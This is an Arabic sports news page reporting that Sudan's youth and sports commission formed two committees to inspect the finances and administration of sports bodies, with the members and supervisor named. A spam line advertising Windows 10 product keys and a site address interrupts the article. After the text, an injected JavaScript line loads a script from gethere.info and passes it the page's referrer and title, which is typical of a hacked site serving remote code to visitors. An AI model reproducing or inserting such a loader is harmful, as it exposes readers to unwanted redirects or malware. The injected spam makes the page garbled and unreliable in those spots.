الرئيسية / الاخبار الرياضية / اجمد عبد القادر مشرف علي اللجان ..​لجنتان للتفتيش المالي على المؤسسات الرياضية بالسودان

اجمد عبد القادر مشرف علي اللجان ..​لجنتان للتفتيش المالي على المؤسسات الرياضية بالسودان

احمد عبد القادركشفت المفوضية الوطنية لهيئات الشباب والرياضة التي تكونها وزارة الشباب والرياضة الاتحادية السودانية عن قرار رسمي صدر بتكوين لجنتين للتفتيش المالي والاداري على هيئات الشباب والرياضة، وذلك في أولى مهام أعمالها بعد صدور القانون الجديد للشباب والرياضة 2016. وجاء القرار الذي تسلم نسخة منه، استناداً الى المادة (31) من قانون هيئات الشباب والرياضة للعام 2016.
وتكونت اللجنة الأولى من العميد عبدالرحمن بشر عربي رئيساً وعضوية كل من اللواء عادل بلال، والدكتور حمد النيل، ممثل ديوان المراجع القومي، وتاج السر محمد عبدالرؤوف، فيما أسند القرار رئاسة اللجنة الثانية للدكتور حاتم عبدالماجد الليلى وعضوية كل من اللواء صلاح الدين مطر، الدكتور معتصم رحمة، ممثل ديوان المراجع العام عضواً ومقرراً، والعقيد اسامة فيروز محمد. وحدد القرار مهام واختصاصات اللجنتين في تفتيش ورقابة الهيئات الشبابية والرياضية، استدعاء أي شخص للإدلاء بأي شهادة أو تقديم أي بيانات أو مستندات تساعد اللجنتين في أعمالهما وطلب أي معلومات تراها ضرورية وتساعدها في أداء مهامها وللجنة الحق في الاستعانة بمن تراه مناسباً لمساعدتها في إنجاز مهامها وترفع اللجنة تقاريرها فور الانتهاء من أعمالها أولاً بأول للمفوضية الوطنية لتقرر بشأنها على أن تباشر اللجنتين أعمالهما فور صدور هذا القرار.windows 10 product key 2017
windowskeyonline.com
إلى ذلك وإلحاقاً بهذا القرار أصدرت المفوضية قرارًا بتعيين أحمد عبدالقادر أحمد عضو المفوضية مشرفاً على أعمال اللجنتين، إلى جانب فخري تاج موسى للسكرتارية وتتخذ اللجنتين من مكاتب المفوضية مقراً لمباشرة مهامهما.
يذكر أن الإعلان عن تعيين هاتين اللجنتين تكون الرياضة بالسودان قد دخلت مرحلة جديدة من خلال رقابة وزارة الشباب والرياضة المباشرة على الأنشطة المالية والإدارية للهيئات والاتحادات الرياضية وهو أمر لم يكن يطبق في تاريخ الرياضة بالسودان من قبل.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

التعليق بواسطة فيس بوك

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*